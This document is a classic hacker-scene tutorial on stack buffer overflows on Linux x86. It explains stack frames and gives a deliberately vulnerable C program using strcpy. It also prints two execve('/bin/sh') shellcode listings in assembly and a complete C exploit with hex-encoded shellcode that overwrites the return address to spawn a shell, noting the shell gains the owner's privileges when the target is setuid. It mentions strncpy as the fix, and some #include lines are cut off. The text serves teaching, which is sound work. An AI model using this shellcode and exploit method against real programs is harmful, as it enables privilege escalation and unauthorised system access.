Buffer Overruns, whats the real story?
By Lefty lefty@sliderule.geek.org.uk
Please note that the examples in this file are linux specific, however
the principle applies to many os's, however the actual stack frame may
vary (and does) on different platforms, as well as the machine code
(obviously :)
In its simplest terms, a buffer overrun is writing to more memory than
was reserved.. Since this happens on the stack, an understanding of
how the stack works is essiential to altering how a program works,
during runtime (normally code isnt executed off the stack, and some
OS's prevent it, as you can only execute from the code section and not
the data section.. However most unices (all I know of) allow it)..
The stack is something that almost every machine uses. Macs, PC's, unix
boxes of various flavors, etc. It is typically done almost the same way.
That is, starting at high memory and working its way down to low memory.
Since every operating system can deal with the stack differently I
will only go into how linux (on X86) does it (this file should however make it
fairly obvious how to figure out the stack on other platforms as well,
providing that there isnt a whole lot of indirection (such as on a prime)
but enough of this)..
Why use a stack? Well the stack allows for memory storage when you dont
have enough registers. Since it would be impossible to know exactly how
many registers every program that is to run on a general purpose computer
will need, there has to be limits for the registers. Also, could you imagine
doing a string via registers?!! :)
The stack starts at a high memory address and works its way down to
a low memory address. Things are PUSHed onto the stack or POPed off
the stack. When something is PUSHed onto the stack, the value that
is being PUSHed is copied into the memory location pointed to by
the stack pointer, and the stack pointer is decremented to reflect
the next spot on the stack. When something is POPed off, the reverse
happens.
With the stack set up this way, you can call a lot of routines and always
return with minimal effort (on the cpu/program)..
When a function is called, certain things change the stack.. Local args
are PUSHed onto the stack, then the return address (code segment), then
the old base pointer (so its known where on the stack you were before
this function was called), then local variables to that function..
Now, all we have to do is find out where a program will let us insert data
into it, and hopefully it wont check the length of data, so we can overwrite
onto the stack, and send in our code (we always write better code than
the original programmer :)
Lets say that we see a routine in a program like this:
hole(overflow)
char *overflow;
{
char buff[2];
strcpy(buff,overflow);
}
Well we know that strcpy(3) doesnt check the length of the data that is sent to
it, so we can easily overwrite the stack frame, and make that program execute
other code.. But how do we figure out where the stack frame is? Well from
the explanation before, buff would be on the stack right? So we could
modify hole() to tell us what its location is (by printing out its address),
or better yet use a debugger to tell us where it is.. However you do it
is really irrevalent.. If you only add code to a program you dont change
the stack..
Once we know its memory location its not far from exploiting it. Lets assume
that buff's address is BFFFFD48.. We could draw the stack as follows:
Value Addr Description
XX XX XX XX BF FF FD 52 overflow
XX XX XX XX BF FF FD 5E return address (from hole())
XX XX XX XX BF FF FD 4A old base pointer
XX XX XX XX BF FF FD 48 2 bytes reserved for buff (32 bit pad)
... This is where strcpy(3) and such adds
to the stack frame
Remember that the stack is basically backwards, so when you write to
buff you write to higher memory locations. strcpy(3) will also add on a null
to the end, so we have to take that into account (to avoid a segv, but it
shouldnt be a problem if we only use a small ammount of code).
Notice that we cant access the return addr from strcpy(3) but we can
for hole().. That is where we will target.. Now, we know that we have to
send in 2 bytes to fill buff, 4 bytes for the old base pointer (it has to be
accessable to us, or it will segv) and 4 bytes to fill in the return address..
Then our machine code (which the return addr will point to)
If we enter say:
ABCDBFFFFD52BFFFFD52xxxxxx...
The stack will look like:
xx xx xx xx BF FF FD 52 overflow
52 FD FF BF BF FF FD 5E return address
52 FD FF BF BF FF FD 4A old base pointer
CD AB XX XX BF FF FD 48 contents of buff (padded to 32bit)
... This is where strcpy(3) and such adds
to the stack frame
When hole() returns, it will use the return addr that we set, and execute
the code that we sent, provided that any args passed to hole() arent modified
after we set them (remember that is where the machine code is)..
I choose to put the machine code on the stack prior to the return address..
Some people choose to put it in the buffer that is going to be overflowed..
In this case you cant, as there is only 2 bytes and that is hardly enough
room, however in a lot of cases the buffer is much larger..
Lets say that we wanted to just execute a shell.. That is fairly simple
and straight forward. Here is some code that will do that..
This is the execve(2) command in asm (for linux). I have commented it so that
you know what it is doing a little better..
********************** shell.S -cut here- *********************************
.global _start
_start:
movl $programname, %ebx # ebx = program to execute
movl $arguments, %esi # setting up argv[0]
movl %ebx, (%esi) # set argv[0]
movl %esi, %ecx # ecx = char **argv
movl $environment, %edx # edx = char **envp
movl $0x0b, %eax # Syscall 11 is
int $0x80 # execve()
movl $1, %eax # syscall 1 is exit
int $0x80 # ebx holds error value
.data
arguments:
.byte 0,0,0,0,0,0,0,0 # this is argv
environment:
.byte 0,0,0,0 # this is envp
programname:
.asciz "/bin/sh" # this is the program to execute
********************** shell.S -cut here- *********************************
There is an assembler on most unix systems called as. You can use that to
compile this so you have something to play with.. A suitable command line
would be:
as -a -o shell.o shell.S > shell.asm ; ld -o shell shell.o
(the machine code (in hex) is contained in shell.asm)
For more information on this you may want to view the man page on execve(2).
The example just given is not quite valid.. It has nulls in it, and it makes
it harder becuase it has to have hardcoded offsets in it.. There is a better
way, which gheap did for splitvt...
I dont know who really wrote this, as what was given to me was just the
instructions, so I cant give credit (since there is a VERY limited way
you can do this, with the same functionality, I am using someone elses
code).. This code will jmp (local instrction) to just before the data,
then the call (local instruction) will push the address that follows that
instruction on the stack, and then go to almost the top.. This puts the
address of the program to execute on the stack.. It is careful to avoid
nulls as well..
********************** shell2.S -cut here- *********************************
.global _start
_start:
jmp ending # jmp to get the addr of the args
# jmp and call are local
secondstart:
popl %esi # get addr of programname
leal (%esi),%ebx # move addr in ebx
movl %ebx, 0x0B(%esi) # mov programnmae addr into args
xor %dx, %dx # zero out ecx
movl %edx, 7(%esi) # add the null to the end of program
name
movl %edx, 0x0F(%esi) # zero out argv[1]
movl $0x1234561b, %eax # set eax to
xorl $0x12345610, %eax # 0x0000000b
leal 0x0b(%esi), %ecx # mov argv[1] into ecx (null no args
)
mov %ecx, %edx # mov **envp into edx (null no envi
ronment)
int $0x80 # execve(ebx,ecx,edx)
# ebx=filename ecx=**argv edx=**envp
# the next 3 instructions totally needed, but it forces an exit so that
# any other vars you overwrote etc, wont cause the program that was
# overflowed to blow up..
xor %eax, %eax # zero out eax
inc %eax # set eax to 1
int $0x80 # exit(ebx) # ebx isnt set
ending:
call secondstart # call pushes addr of programname
programname:
.byte '/','b','i','n','/','s','h'
********************** shell2.S -cut here- *********************************
Now that we have a sample of the machine code, lets put it all together and
overrun something...
This program is vunerable to an overflow.. Granted its a really stupid
example..
********************** hole.c -cut here- *********************************
#include
#include
main(argc,argv)
int argc;
char **argv;
{
if(argc != 2) {
printf("Usage: %s overflow\n",argv[0]);
exit(1);
}
hole(argv[1]);
}
hole(overflow)
char *overflow;
{
char buff[2];
strcpy(buff,overflow);
}
********************** hole.c -cut here- *********************************
Here is one example of an exploit for hole.c..
********************** exp.c -cut here- *********************************
#include
#include
#include
#define OFFSET 4
#define BUFFER_SIZE 2
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i;
u_char execve[] =
"\xeb\x24" /* jmp ending */
/* secondstart: */
"\x5e" /* popl %esi */
"\x8d\x1e" /* leal (%esi),%ebx */
"\x89\x5e\x0b" /* movl %ebx, 0x0B(%esi) */
"\x31\xd2" /* xor %edx, %edx */
"\x89\x56\x07" /* movl %edx, 7(%esi) */
"\x89\x56\x0f" /* movl %edx, 0x0F(%esi) */
"\xb8\x1b\x56\x34\x12" /* movl $0x1234561b, %eax */
"\x35\x10\x56\x34\x12" /* xorl $0x12345610, %eax */
"\x8d\x4e\x0b" /* leal 0x0b(%esi), %ecx */
"\x89\xca" /* mov %ecx, %edx */
"\xcd\x80" /* int $0x80 */
"\x31\xc0" /* xor %eax, %eax */
"\x40" /* inc %eax */
"\xcd\x80" /* int $0x80 */
/* ending: */
"\xe8\xd7\xff\xff\xff" /* call secondstart */
"/bin/sh"; /* programname */
if((buff = malloc(BUFFER_SIZE+8+strlen(execve)))==0) {
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
/* fill start of buffer with nops */
memset(ptr, 0x90, BUFFER_SIZE);
ptr += BUFFER_SIZE;
/* write the return addresses */
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() - OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
/* stick asm code into the buffer */
memcpy(ptr,execve,strlen(execve));
execl("/home/lefty/stack/hole", "hole", buff, NULL);
}
********************** exp.c -cut here- *********************************
Now lets look at how this program works..
The stack looks something like when hole is run and hole() is called:
| Previous Stack Area | Higher memory addr
| argc, argv, envp, as well |
| as other info (varies if elf/a.out) |
|------------------------------------------|
| char *argv[1] |
|------------------------------------------|
| Return Address |
|------------------------------------------|
| Old Base Pointer |<- Base Pointer points here
|------------------------------------------|
| 2 bytes for char buff[2] |
| 32 bit pad (4 bytes total) |
|------------------------------------------|
| |<- ESP will point here
| | which is the next
| | available place on
| | the stack
| |
| |
| | Lower memory addr
Now when the strcpy(3) is called, it will copy ALL of the data that argv[1]
points to into buff.. After the first 2 bytes we are writing on a portion
of the stack that we really shouldnt be allowed to, but for some reason we
are allowed to..
So, we fill the buffer full of garbage that is a non null (a null will cause
strcpy(3) to stop copying data), then write the old base pointer, then the
return address (when hole() will return to main()), and then the machine
code that will allow us to execute a shell.. If hole is suid we get a euid
of whatever user owns it..
A patch for hole is really simple.. Instead of using strcpy(3) use strncpy(3)
and specify a length that is less than or equal to the total length of
the buffer it is going into.. Remember that strcpy(3) and strncpy(3) both
copy the null at the end of the string..
If you notice I had 2 things defined in exp.c.. I will tell you how
I got them.. I'd like to go into BUFFER_SIZE first as its easier to explain..
That is the size of the buffer to the point where we would start writing
on the stack.. If there were other variables on the stack before the buffer
that we are filling, those also have to be added to this total.. In this case
there werent any, so its the sizeof buff..
The second thing that I defined was OFFSET.. This is what is subtracted from
the stack pointer as returned by the asm routine (return values in C are stored
in EAX) in the exploit program.. This is computed by:
When execl(3) is called, it changes the stack frame.. There is an environment
variable that is set to the current program running.. Instead of being
'exp' it is now '/home/lefty/stack/hole' which is 19 bytes longer.. Since
there is 32 bit padding, its 20 bytes.. There is also 64 bytes added in
argv[1].. This is the execve, as well as the 2 pointers and the
BUFFER_SIZE.. That brings our total to 84 bytes that are added (ie lower
stack address).. Some of this is offset however.. There are 68 bytes of
variables (32 bit padded) in the exploit program that are lost (beucase they
arent in hole).. So our total now is 16 bytes.. argv[0] is changed to the
first arg in execl(3) which as we discussed earlier was 19 bytes longer, after
the 32 bit padding, its 20 bytes (after starting the new process argv[0] is
changed to the 2nd arg in execl(3) however its already taken the space on the
stack).. Which means our total is -4 bytes..
Now, since in the exploit program there isnt any more stack space taken before
the spot where we will write our machine code, we dont have to do anymore
math.. If however there was some stack stuff, that would have to be computed,
and subtracted from our current value (-4)..
You should have learned by now how to get the offsets, buffer sizes, etc to
write your own exploits if that is what pleases you, or at least know that
you can, after all isnt hacking supposed to be about learning, and not about
who has the 0day scripts? Or is it just me...
One last thing.. Dont ask me for exploit code after reading this, I will not
give it to you.. If you really really have to have exploit code, write it
yourself, you may learn something new when you do it..